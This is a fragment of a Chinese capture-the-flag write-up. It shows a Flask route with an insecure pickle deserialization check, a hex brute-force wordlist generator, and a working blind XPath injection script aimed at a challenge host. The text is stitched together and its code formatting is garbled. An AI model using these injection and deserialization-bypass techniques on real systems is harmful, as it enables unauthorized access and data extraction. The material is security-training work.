@app.route('/admin') defadmin(): if session.get('user') != "admin": returnf"<script>alert('Access Denied');window.location.href='/'</script>" else: try: a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes") ifb'R'in a orb'i'in a orb'o'in a orb'b'in a: raise pickle.UnpicklingError("R i o b is forbidden") pickle.loads(base64.b64decode(session.get('ser_data'))) return"ok" except: return"error!"
if __name__ == '__main__': app.run(host='0.0.0.0', port=8888)
hexs = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'] withopen("./1.txt", "a") as f: for i in hexs: for j in hexs: for m in hexs: for n in hexs: str = "{}{}{}{}\n".format(i, j, m, n) print(str) f.write(str)
接着就是要绕过反序列化执行命令了
a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes") ifb'R'in a orb'i'in a orb'o'in a orb'b'in a: raise pickle.UnpicklingError("R i o b is forbidden") pickle.loads(base64.b64decode(session.get('ser_data')))
这个ser_data是从session里取的,所以我们要伪造session传入pcikle反序列化的数据,同时他也限制了R i o b四个操作符
url = "http://eci-2zeetzz54w4b5tinoysb.cloudeci1.ichunqiu.com:8888/hello" strs = "{-}" + string.ascii_letters + string.digits result = "" end = False for a inrange(1,100): if end: print("[+]Done!: {}".format(result)) break for i in strs: print("[+]Test:{} {}".format(a,i)) # data = {"xpath" : "1'or substring(name(/*[1]), {}, 1)='{}' and '1'='1".format(a,i)} # data = {"xpath" : "1'or substring(name(/root/*[1]), {}, 1)='{}' and '1'='1".format(a,i)} # data = {"xpath" : "1'or substring(name(/root/user/*[2]), {}, 1)='{}' and '1'='1".format(a,i)} data = {"xpath" : "1'or substring(/root/user/username[position()=2]/text(), {}, 1)='{}' and '1'='1".format(a,i)} resp = res.post(url=url, data=data) # print(resp.text) if resp.text.find("<p>user1</p>") != -1: result += i print("[+]Matched: " + result) break if i == strs[len(strs)-1:]: end = True
